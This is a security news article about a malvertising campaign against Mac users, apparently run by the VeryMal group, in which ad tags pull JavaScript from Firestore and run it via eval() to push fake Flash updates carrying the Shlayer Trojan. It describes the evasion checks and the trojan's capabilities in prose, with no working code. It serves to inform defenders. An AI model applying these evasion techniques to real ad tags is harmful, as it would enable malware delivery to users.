A new, large-scale Mac malvertising campaign was just discovered. Security researchers at Confiant say that approximately 1 million user sessions have been potentially exposed. The payload of the malvertising campaign is the Shlayer Trojan.
Who’s Behind the Mac Malvertising Campaign?
It’s believed that a group known as VeryMal is behind these Mac malvertising attacks. The group has been targeting Mac users, and it seems that it just changes switched to a new malicious scenario. Previously, VeryMal criminals used steganography as an obfuscation technique. Now, the group is utilizing ad tags that retrieve a payload from Google Firebase with the purpose of redirecting users to malicious pop-ups, Confiant said.
What is Firebase? Firebase is a mobile and web application development platform developed by Firebase, Inc. in 2011, then acquired by Google in 2014. The platform is rich in features, and has a cloud-hosted backend suite which is typically used for mobile app development. One of the components exploited by the attackers is Firestore, and it’s been leveraged in creative tags.
“The code in the tag actually does nothing more than request an entry from the attacker’s Firestore DB and then execute it as JavaScript using the eval() statement on line 27”, the researchers noted.
After first checking to see if it’s running in a desktop Safari environment, the code has a sub-condition that checks to see if “navigator.javaEnabled()” has been tampered with in the current environment. If all checks out, the payload will redirect the unsuspecting visitor to the Flash prompt. The notable aspect however is that the tag looks to most people and defense mechanisms like a normal, innocuous ad tag.
Fortunately, Google has suspended the abused Firebase accounts, but researchers believe that cybercriminals with continue to leverage this technique.
As for the display-ad redirects, they are being deployed to deliver fake Flash updates to unsuspecting users. Once the potential victim interacts with the ad on a website, a pop-up shows prompting the user to update their Flash player. Upon agreeing to the prompt, the payload, Shlayer Trojan, will be deployed.
More about the Shlayer Trojan
The Shlayer Trojan has been known for using fake Adobe Flash updates. A previous campaign used fake updates fake updates that masqueraded as legitimate sites, or hijacked domains formerly hosting legitimate sites.
Malicious browser extensions have also been used by the Trojan. The dangerous code is disguised once again as an Adobe Flash Player installer.
Keep in mind that the Shlayer Mac Trojan can lead to further infections. Given its complex modular design, it can easily be used for other malicious purposes, such as the following:
Information Harvesting. The malware can be used to harvest data that can be configured to extract both machine metrics and user information. The first category is used to generate an unique ID that is assigned to each individual machine. This is done via an algorithm that uses a list of installed hardware components, user settings and other operating system metrics. It can also directly expose the identity of the victims by looking out for strings that can reveal their name, address, phone number, location and any stored account credentials.
System Changes. To facilitate further infections the payload code can make various changes to the compromised machines — configuration files, operating system environment values and user settings.
Boot Options Modifications. By accessing the Mac OS computers settings the Shlayer Trojan can set itself or the other deployed payloads to automatically start when the computer is powered on.
Additional Payload Delivery. The Trojan can be used to deliver other threats to the computers such as miners and ransomware.